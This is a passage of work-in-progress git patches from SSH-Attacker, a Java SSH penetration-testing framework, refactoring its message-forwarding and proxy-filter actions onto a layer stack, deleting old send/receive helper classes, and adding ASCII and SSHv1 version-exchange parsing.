EcdhKeyExchangeReplyMessage message = new EcdhKeyExchangeReplyMessage(); + readDataContainer(message, context); + } + private void readChannelSuccessMessage() { ChannelSuccessMessage message = new ChannelSuccessMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index 9b05976a8..d2c02b1cf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -9,15 +9,15 @@ import de.rub.nds.modifiablevariable.HoldsModifiableVariable; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.*; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; -import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; -import de.rub.nds.tlsattacker.transport.TransportHandler; import jakarta.xml.bind.annotation.*; import java.io.IOException; import java.util.*; @@ -54,6 +54,11 @@ public class ForwardMessagesAction extends SshAction implements ReceivingAction, @XmlTransient private byte[] receivedBytes; + // equvialent to recived records + protected List receivedPackets; + + protected List sendPackets; + public ForwardMessagesAction() { this.receiveMessageHelper = new ReceiveMessageHelper(); this.sendMessageHelper = new SendMessageHelper(); @@ -112,18 +117,52 @@ public void execute(State state) throws WorkflowExecutionException { throw new WorkflowExecutionException("Action already executed!"); } assertAliasesSetProperly(); + SshContext receiveFromCtx = state.getSshContext(receiveFromAlias); - initLoggingSide(receiveFromCtx); SshContext forwardToCtx = state.getSshContext(forwardToAlias); + + initLoggingSide(receiveFromCtx); + + // Reihenfolge TLS Attacker: Recive, Apply, Forward receiveMessages(receiveFromCtx); + applyMessages(forwardToCtx); forwardMessages(forwardToCtx); // handleReceivedMessages(receiveFromCtx); - applyMessages(forwardToCtx); + } protected void receiveMessages(SshContext receiveFromCtx) { LOGGER.debug("Receiving Messages..."); - try { + + LayerStack layerStack = receiveFromCtx.getLayerStack(); + + LayerConfiguration messageConfiguration = + new SpecificReceiveLayerConfiguration(ImplementedLayers.SSHv2, messages); + + List layerConfigurationList = + sortLayerConfigurations(layerStack, messageConfiguration); + LayerStackProcessingResult processingResult; + processingResult = layerStack.receiveData(layerConfigurationList); + + receivedMessages = + new ArrayList<>( + processingResult + .getResultForLayer(ImplementedLayers.SSHv2) + .getUsedContainers()); + receivedPackets = + new ArrayList<>( + processingResult + .getResultForLayer(ImplementedLayers.TransportLayer) + .getUsedContainers()); + + String expected = getReadableString(receivedMessages); + LOGGER.debug("Receive Expected (" + receiveFromAlias + "): " + expected); + String received = getReadableString(receivedMessages); + LOGGER.info("Received Messages (" + receiveFromAlias + "): " + received); + + executedAsPlanned = checkMessageListsEquals(messages, receivedMessages); + + /* try { receivedBytes = receiveMessageHelper.receiveBytes(receiveFromCtx); } catch (IOException e) { LOGGER.warn( @@ -131,15 +170,50 @@ protected void receiveMessages(SshContext receiveFromCtx) { e.getLocalizedMessage()); LOGGER.debug(e); receiveFromCtx.setReceivedTransportHandlerException(true); - } + }*/ } protected void forwardMessages(SshContext forwardToCtx) { + LOGGER.info( "Forwarding messages (" + forwardToAlias + "): " + getReadableString(receivedMessages)); + + try { + LayerStack layerStack = forwardToCtx.getLayerStack(); + LayerConfiguration messageConfiguration = + new SpecificSendLayerConfiguration(ImplementedLayers.SSHv2, receivedMessages); + LayerConfiguration packetConfiguration = + new SpecificSendLayerConfiguration( + ImplementedLayers.TransportLayer, receivedPackets); + + List layerConfigurationList = + sortLayerConfigurations(layerStack, messageConfiguration, packetConfiguration); + LayerStackProcessingResult processingResult = + layerStack.sendData(layerConfigurationList); + + sendMessages = + new ArrayList<>( + processingResult + .getResultForLayer(ImplementedLayers.SSHv2) + .getUsedContainers()); + sendPackets = + new ArrayList<>( + processingResult + .getResultForLayer(ImplementedLayers.TransportLayer) + .getUsedContainers()); + + executedAsPlanned = checkMessageListsEquals(sendMessages, receivedMessages); + + setExecuted(true); + + } catch (IOException e) { + LOGGER.debug(e); + throw new RuntimeException(e); + } + /* try { AbstractPacketLayer packetLayer = forwardToCtx.getPacketLayer(); TransportHandler transportHandler = forwardToCtx.getTransportHandler(); @@ -152,7 +226,7 @@ protected void forwardMessages(SshContext forwardToCtx) { LOGGER.debug(e); executedAsPlanned = false; setExecuted(false); - } + }*/ } /* protected void handleReceivedMessages(SshContext ctx) { @@ -172,10 +246,10 @@ protected void forwardMessages(SshContext forwardToCtx) { */ protected void applyMessages(SshContext ctx) { changeSshContextHandling(ctx); - for (ProtocolMessage msg : receivedMessages) { + for (ProtocolMessage msg : receivedMessages) { LOGGER.debug("Applying " + msg.toCompactString() + " to forward context " + ctx); - ProtocolMessageHandler h = msg.getHandler(ctx); - // h.adjustContext(); + ProtocolMessageHandler h = msg.getHandler(ctx); + h.adjustContext(msg); } changeSshContextHandling(ctx); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java index 5b171e483..5f617cb9e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java @@ -70,7 +70,7 @@ public void execute(State state) throws WorkflowExecutionException { initLoggingSide(receiveFromCtx); receiveMessages(receiveFromCtx); - // handleReceivedMessages(receiveFromCtx); + // - affected - handleReceivedMessages(receiveFromCtx); filterMessages(receiveFromCtx, forwardToCtx); forwardMessages(forwardToCtx); applyMessages(forwardToCtx); From 6ee0738636cc2fffe1cd2a8537ffd91eb188d505 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 22 Jul 2023 01:05:17 +0200 Subject: [PATCH 043/176] wip: Cleanup and delete "ReciveMessageHelper" and "SendMessageHelper" --- .../core/layer/impl/SSH2Layer.java | 9 +- .../action/ForwardMessagesAction.java | 27 +-- .../action/ProxyFilterMessagesAction.java | 62 ++++- .../action/executor/ReceiveMessageHelper.java | 227 ------------------ .../action/executor/SendMessageHelper.java | 52 ---- .../test/java/executing/NetcatWorkflow.java | 5 - .../java/executing/NetcatWorkflowFactory.java | 4 - 7 files changed, 64 insertions(+), 322 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 22b86e66d..ed6c1f871 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -250,10 +250,10 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_KEX_ECDH_INIT: readKexECDHInit(); break; -/* Not Implementended Yet - case SSH_MSG_EXT_INFO: - readExtensionInfo(); - break;*/ + /* Not Implementended Yet + case SSH_MSG_EXT_INFO: + readExtensionInfo(); + break;*/ default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); throw new RuntimeException(); @@ -670,7 +670,6 @@ private void readIngoreMessage() { readDataContainer(message, context); } - private void readKexECDHInit() { EcdhKeyExchangeInitMessage message = new EcdhKeyExchangeInitMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index d2c02b1cf..4a57e063b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -16,8 +16,6 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; -import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; import jakarta.xml.bind.annotation.*; import java.io.IOException; import java.util.*; @@ -44,10 +42,10 @@ public class ForwardMessagesAction extends SshAction implements ReceivingAction, @XmlTransient protected List> messages; @HoldsModifiableVariable @XmlElementWrapper protected List> sendMessages; - + /* @XmlTransient protected ReceiveMessageHelper receiveMessageHelper; - @XmlTransient protected SendMessageHelper sendMessageHelper; + @XmlTransient protected SendMessageHelper sendMessageHelper;*/ @XmlAttribute(name = "onConnection") protected String forwardedConnectionAlias = null; @@ -60,23 +58,20 @@ public class ForwardMessagesAction extends SshAction implements ReceivingAction, protected List sendPackets; public ForwardMessagesAction() { - this.receiveMessageHelper = new ReceiveMessageHelper(); - this.sendMessageHelper = new SendMessageHelper(); + /* this.receiveMessageHelper = new ReceiveMessageHelper(); + this.sendMessageHelper = new SendMessageHelper();*/ } - public ForwardMessagesAction(String receiveFromAlias, String forwardToAlias) { + /* public ForwardMessagesAction(String receiveFromAlias, String forwardToAlias) { this(receiveFromAlias, forwardToAlias, new ReceiveMessageHelper()); - } + }*/ /** Allow to pass a fake ReceiveMessageHelper helper for testing. */ - protected ForwardMessagesAction( - String receiveFromAlias, - String forwardToAlias, - ReceiveMessageHelper receiveMessageHelper) { + protected ForwardMessagesAction(String receiveFromAlias, String forwardToAlias) { this.receiveFromAlias = receiveFromAlias; this.forwardToAlias = forwardToAlias; - this.receiveMessageHelper = receiveMessageHelper; - this.sendMessageHelper = new SendMessageHelper(); + /* this.receiveMessageHelper = receiveMessageHelper; + this.sendMessageHelper = new SendMessageHelper();*/ forwardedConnectionAlias = receiveFromAlias + " to " + forwardToAlias; } @@ -85,8 +80,8 @@ public ForwardMessagesAction( this.messages = messages; this.receiveFromAlias = receiveFromAlias; this.forwardToAlias = forwardToAlias; - this.receiveMessageHelper = new ReceiveMessageHelper(); - this.sendMessageHelper = new SendMessageHelper(); + /* this.receiveMessageHelper = new ReceiveMessageHelper(); + this.sendMessageHelper = new SendMessageHelper();*/ forwardedConnectionAlias = receiveFromAlias + " to " + forwardToAlias; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java index 5f617cb9e..556497a07 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java @@ -8,6 +8,11 @@ package de.rub.nds.sshattacker.core.workflow.action; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; +import de.rub.nds.sshattacker.core.layer.LayerStack; +import de.rub.nds.sshattacker.core.layer.LayerStackProcessingResult; +import de.rub.nds.sshattacker.core.layer.SpecificSendLayerConfiguration; +import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthHostbasedMessage; import de.rub.nds.sshattacker.core.protocol.authentication.message.UserAuthPubkeyMessage; @@ -15,9 +20,9 @@ import de.rub.nds.sshattacker.core.protocol.authentication.preparator.UserAuthPubkeyMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; -import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; import jakarta.xml.bind.annotation.XmlTransient; +import java.io.IOException; +import java.util.ArrayList; import java.util.List; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,20 +36,17 @@ public class ProxyFilterMessagesAction extends ForwardMessagesAction { @XmlTransient protected List> filteredMessages; public ProxyFilterMessagesAction() { - this.receiveMessageHelper = new ReceiveMessageHelper(); - this.sendMessageHelper = new SendMessageHelper(); + /* this.receiveMessageHelper = new ReceiveMessageHelper(); + this.sendMessageHelper = new SendMessageHelper();*/ } - public ProxyFilterMessagesAction(String receiveFromAlias, String forwardToAlias) { + /* public ProxyFilterMessagesAction(String receiveFromAlias, String forwardToAlias) { super(receiveFromAlias, forwardToAlias, new ReceiveMessageHelper()); - } + }*/ /** Allow to pass a fake ReceiveMessageHelper helper for testing. */ - protected ProxyFilterMessagesAction( - String receiveFromAlias, - String forwardToAlias, - ReceiveMessageHelper receiveMessageHelper) { - super(receiveFromAlias, forwardToAlias, receiveMessageHelper); + protected ProxyFilterMessagesAction(String receiveFromAlias, String forwardToAlias) { + super(receiveFromAlias, forwardToAlias); } public ProxyFilterMessagesAction( @@ -72,8 +74,8 @@ public void execute(State state) throws WorkflowExecutionException { receiveMessages(receiveFromCtx); // - affected - handleReceivedMessages(receiveFromCtx); filterMessages(receiveFromCtx, forwardToCtx); - forwardMessages(forwardToCtx); applyMessages(forwardToCtx); + forwardMessages(forwardToCtx); } @Override @@ -82,7 +84,41 @@ protected void forwardMessages(SshContext forwardToCtx) { "Forwarding messages (" + forwardToAlias + "): " - + getReadableString(receivedMessages)); + + getReadableString(filteredMessages)); + + try { + LayerStack layerStack = forwardToCtx.getLayerStack(); + LayerConfiguration messageConfiguration = + new SpecificSendLayerConfiguration(ImplementedLayers.SSHv2, filteredMessages); + LayerConfiguration packetConfiguration = + new SpecificSendLayerConfiguration( + ImplementedLayers.TransportLayer, receivedPackets); + + List layerConfigurationList = + sortLayerConfigurations(layerStack, messageConfiguration, packetConfiguration); + LayerStackProcessingResult processingResult = + layerStack.sendData(layerConfigurationList); + + sendMessages = + new ArrayList<>( + processingResult + .getResultForLayer(ImplementedLayers.SSHv2) + .getUsedContainers()); + sendPackets = + new ArrayList<>( + processingResult + .getResultForLayer(ImplementedLayers.TransportLayer) + .getUsedContainers()); + + executedAsPlanned = checkMessageListsEquals(sendMessages, filteredMessages); + + setExecuted(true); + + } catch (IOException e) { + LOGGER.debug(e); + throw new RuntimeException(e); + } + /*MessageActionResult result = sendMessageHelper.sendMessages(forwardToCtx, filteredMessages.stream()); sendMessages = result.getMessageList(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java deleted file mode 100644 index 23cf8baa7..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java +++ /dev/null @@ -1,227 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.workflow.action.executor; - -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.CharConstants; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.protocol.transport.message.DisconnectMessage; -import java.io.IOException; -import java.util.ArrayList; -import java.util.List; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -/** A helper class to receive and process bytes from transport handler. */ -public class ReceiveMessageHelper { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Receives and handles messages from the underlying transport handler. - * - * @param context The SSH context - * @return A message action result containing the received packets and messages - */ - /* public MessageActionResult receiveMessages(SshContext context) { - return receiveMessages(context, new LinkedList<>()); - }*/ - - /** - * Receives and handles messages from the underlying transport handler. - * - * @param context The SSH context - * @param expectedMessages A list of expected messages - * @return A message action result containing the received packets and messages - */ - /* public MessageActionResult receiveMessages( - SshContext context, List> expectedMessages) { - MessageActionResult result = new MessageActionResult(); - try { - byte[] receivedBytes; - int receivedBytesLength = 0; - boolean shouldContinue = true; - do { - receivedBytes = receiveBytes(context); - receivedBytesLength += receivedBytes.length; - MessageActionResult tempResult = handleReceivedBytes(context, receivedBytes); - result = result.merge(tempResult); - if (context.getConfig().isQuickReceive() && !expectedMessages.isEmpty()) { - shouldContinue = - testShouldContinueReceiving( - context, expectedMessages, tempResult.getMessageList()); - } - if (receivedBytesLength >= context.getConfig().getReceiveMaximumBytes()) { - shouldContinue = false; - } - } while (receivedBytes.length != 0 && shouldContinue); - } catch (IOException e) { - LOGGER.warn( - "Received an IOException while fetching data from socket: {}", - e.getLocalizedMessage()); - LOGGER.debug(e); - context.setReceivedTransportHandlerException(true); - } - return result; - }*/ - - /** - * Receives bytes from the underlying transport handler. - * - * @param context The SSH context - * @return An array of bytes received from the transport handler - * @throws IOException Thrown by the underlying transport handler if receiving failed - */ - public byte[] receiveBytes(SshContext context) throws IOException { - if (context.isReceiveAsciiModeEnabled()) { - byte[] receiveBuffer = new byte[0]; - byte[] readByte; - do { - readByte = context.getTransportHandler().fetchData(1); - receiveBuffer = ArrayConverter.concatenate(receiveBuffer, readByte); - } while (readByte.length > 0 && readByte[0] != CharConstants.NEWLINE); - return receiveBuffer; - } else { - return context.getTransportHandler().fetchData(); - } - } - - /** - * Receives additional bytes from the underlying transport handler. In contrast to - * receiveBytes() this method will return an empty array instead of throwing an IOException. - * - * @param context The SSH context - * @return An array of bytes received from the transport handler - */ - private byte[] receiveAdditionalBytes(SshContext context) { - try { - return receiveBytes(context); - } catch (IOException e) { - LOGGER.warn("Could not receive more bytes", e); - context.setReceivedTransportHandlerException(true); - } - return new byte[0]; - } - - /** - * Handles received bytes by parsing them into packets and consecutively messages. - * - * @param context The SSH context - * @param receivedBytes Received bytes to handle - * @return A MessageActionResult containing the parsed packets and messages - */ - /* public MessageActionResult handleReceivedBytes(SshContext context, byte[] receivedBytes) { - if (receivedBytes.length == 0) { - return new MessageActionResult(); - } - - int dataPointer = 0; - List retrievedPackets = new LinkedList<>(); - List> parsedMessages = new LinkedList<>(); - do { - PacketLayerParseResult parseResult = parsePacket(context, receivedBytes, dataPointer); - Optional parsedPacket = parseResult.getParsedPacket(); - if (parsedPacket.isPresent()) { - */ - /*ProtocolMessage message = context.getMessageLayer().parse(parsedPacket.get()); - message.getHandler(context).adjustContext(); - retrievedPackets.add(parsedPacket.get()); - parsedMessages.add(message);*/ - /* - } - dataPointer += parseResult.getParsedByteCount(); - } while (dataPointer < receivedBytes.length); - return new MessageActionResult(retrievedPackets, parsedMessages); - }*/ - - /** - * Parses the given bytes into AbstractPackets. If parsing fails, the method will try to receive - * additional bytes from the underlying transport handler. If no additional bytes are available - * or an IOException occurs, bytes will be parsed softly (most likely to BlobPackets) by the - * packet layer. - * - * @param context The SSH context - * @param packetBytes Raw packet bytes to parse - * @param startPosition Start position for parsing - * @return The parse result from the underlying packet layer containing the total number of - * bytes parsed as well as the parsed packet itself - */ - /* private PacketLayerParseResult parsePacket( - SshContext context, byte[] packetBytes, int startPosition) { - try { - return context.getPacketLayer().parsePacket(packetBytes, startPosition); - } catch (ParserException e) { - LOGGER.debug(e); - if (context.getTransportHandler() != null) { - LOGGER.debug( - "Could not parse the provided bytes into packets. Waiting for more data to become available"); - byte[] extraBytes = receiveAdditionalBytes(context); - if (extraBytes != null && extraBytes.length > 0) { - return parsePacket( - context, - ArrayConverter.concatenate(packetBytes, extraBytes), - startPosition); - } - } - LOGGER.debug("Did not receive more bytes. Parsing records softly"); - return context.getPacketLayer().parsePacketSoftly(packetBytes, startPosition); - } catch (CryptoException e) { - LOGGER.debug( - "Could not parse the provided bytes into packets due to a cryptographic error. Parsing records softly"); - LOGGER.debug(e); - return context.getPacketLayer().parsePacketSoftly(packetBytes, startPosition); - } - }*/ - - /** - * Tests if receiving should continue based on a list of expected and received messages. Will - * return false if either a DisconnectMessage (and isStopReceivingAfterDisconnect() flag is set - * in config) or every expected message was received. - * - * @param context The SSH context containing the Config object - * @param expectedMessages List of expected messages - * @param receivedMessages List of received messages - * @return True, if receiving should continue. False otherwise. - */ - private boolean testShouldContinueReceiving( - SshContext context, - List> expectedMessages, - List> receivedMessages) { - boolean receivedDisconnect = - receivedMessages.stream().anyMatch(m -> m instanceof DisconnectMessage); - if (receivedDisconnect && context.getConfig().isStopReceivingAfterDisconnect()) { - return false; - } - return isExpectedMessageMissing(expectedMessages, receivedMessages); - } - - /** - * Checks if for each expected message there is a received message. - * - * @param expectedMessages List of expected messages - * @param receivedMessages List of received messages - * @return A boolean value indicating whether an expected message is missing - */ - private boolean isExpectedMessageMissing( - List> expectedMessages, List> receivedMessages) { - ArrayList> unmatchedMessages = new ArrayList<>(receivedMessages); - for (ProtocolMessage expectedMessage : expectedMessages) { - ProtocolMessage matchingMessage = - unmatchedMessages.stream() - .filter(m -> m.getClass().equals(expectedMessage.getClass())) - .findAny() - .orElse(null); - if (matchingMessage == null) { - return true; - } - unmatchedMessages.remove(matchingMessage); - } - return false; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java deleted file mode 100644 index 5988f632f..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java +++ /dev/null @@ -1,52 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.workflow.action.executor; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; -import de.rub.nds.sshattacker.core.packet.layer.AbstractPacketLayer; -import de.rub.nds.tlsattacker.transport.TransportHandler; -import java.io.IOException; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SendMessageHelper { - - private static final Logger LOGGER = LogManager.getLogger(); - - public void sendPacket(SshContext context, AbstractPacket packet) throws IOException { - AbstractPacketLayer packetLayer = context.getPacketLayer(); - TransportHandler transportHandler = context.getTransportHandler(); - transportHandler.sendData(packetLayer.preparePacket(packet)); - } - - /*public MessageActionResult sendMessage(SshContext context, ProtocolMessage message) { - MessageLayer messageLayer = context.getMessageLayer(); - try { - AbstractPacket packet = messageLayer.serialize(message); - sendPacket(context, packet); - Handler handler = message.getHandler(context); - if (handler instanceof MessageSentHandler) { - ((MessageSentHandler) handler).adjustContextAfterMessageSent(); - } - return new MessageActionResult( - Collections.singletonList(packet), Collections.singletonList(message)); - } catch (IOException e) { - LOGGER.warn("Error while sending packet: " + e.getMessage()); - return new MessageActionResult(); - } - } - - public MessageActionResult sendMessages( - SshContext context, Stream> messageStream) { - return messageStream - .map(message -> sendMessage(context, message)) - .reduce(MessageActionResult::merge) - .orElse(new MessageActionResult()); - }*/ -} diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflow.java b/SSH-Core/src/test/java/executing/NetcatWorkflow.java index 34aab0d9f..4091503c8 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflow.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflow.java @@ -21,8 +21,6 @@ import de.rub.nds.sshattacker.core.workflow.action.ActivateEncryptionAction; import de.rub.nds.sshattacker.core.workflow.action.ReceiveAction; import de.rub.nds.sshattacker.core.workflow.action.SendAction; -import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; -import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; import java.io.BufferedReader; import java.io.InputStreamReader; @@ -79,9 +77,6 @@ public static void main(String[] args) throws Exception { state.getConfig().setWorkflowExecutorShouldClose(false); executor.executeWorkflow(); - SendMessageHelper sendMessageHelper = new SendMessageHelper(); - ReceiveMessageHelper receiveMessageHelper = new ReceiveMessageHelper(); - BufferedReader in = new BufferedReader(new InputStreamReader(System.in)); // noinspection InfiniteLoopStatement while (true) { diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java index b3c472bb5..665b88b5a 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java @@ -13,8 +13,6 @@ import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.DefaultWorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; -import de.rub.nds.sshattacker.core.workflow.action.executor.ReceiveMessageHelper; -import de.rub.nds.sshattacker.core.workflow.action.executor.SendMessageHelper; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowTraceType; import java.io.BufferedReader; @@ -35,8 +33,6 @@ public static void main(String[] args) throws Exception { state.getConfig().setWorkflowExecutorShouldClose(false); executor.executeWorkflow(); - SendMessageHelper sendMessageHelper = new SendMessageHelper(); - ReceiveMessageHelper receiveMessageHelper = new ReceiveMessageHelper(); BufferedReader in = new BufferedReader(new InputStreamReader(System.in)); // noinspection InfiniteLoopStatement From 098291b660b8872da2e7354c647001e42fadb48f Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 23 Jul 2023 15:03:15 +0200 Subject: [PATCH 044/176] wip: fixing missing ASCII-Parser-Identification --- .../de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java | 8 ++++++++ .../nds/sshattacker/core/layer/impl/TransportLayer.java | 2 +- .../src/test/java/executing/NetcatWorkflowFactory.java | 1 - 3 files changed, 9 insertions(+), 2 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index ed6c1f871..009cea5a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -184,6 +184,9 @@ public void readMessageForHint(PacketLayerHint hint) { case CONNECTION: readConnectionProtocolData(); break; + case ASCII_MESSAGE: + readASCIIData(); + break; case VERSION_EXCHANGE_MESSAGE: readVersionExchangeProtocolData(); break; @@ -665,6 +668,11 @@ private void readGlobalRequest() { } } + private void readASCIIData() { + AsciiMessage message = new AsciiMessage(); + readDataContainer(message, context); + } + private void readIngoreMessage() { ChannelSuccessMessage message = new ChannelSuccessMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index b402eba91..ca2b20c97 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -227,7 +227,7 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) byte[] raw = packet.getPayload().getValue(); if (packet instanceof BlobPacket) { String rawText = new String(packet.getPayload().getValue(), StandardCharsets.US_ASCII); - if (rawText.startsWith("SSH-2.0")) { + if (rawText.startsWith("SSH-")) { return new PacketLayerHint(ProtocolMessageType.VERSION_EXCHANGE_MESSAGE); } else { final AsciiMessage message = new AsciiMessage(); diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java index 665b88b5a..c720c0ae7 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java @@ -33,7 +33,6 @@ public static void main(String[] args) throws Exception { state.getConfig().setWorkflowExecutorShouldClose(false); executor.executeWorkflow(); - BufferedReader in = new BufferedReader(new InputStreamReader(System.in)); // noinspection InfiniteLoopStatement while (true) { From 0049b5959cbc4479ab598ec5efed9748bd4b2a9e Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 23 Jul 2023 15:04:36 +0200 Subject: [PATCH 045/176] wip: adding VersionExchangeMessageSSHV1 --- .../VersionExchangeMessageSSHV1Handler.java | 57 +++++++++ .../message/VersionExchangeMessageSSHV1.java | 112 ++++++++++++++++++ .../VersionExchangeMessageSSHV1Parser.java | 72 +++++++++++ ...VersionExchangeMessageSSHV1Preparator.java | 42 +++++++ ...VersionExchangeMessageSSHV1Serializer.java | 69 +++++++++++ 5 files changed, 352 insertions(+) create mode 100644 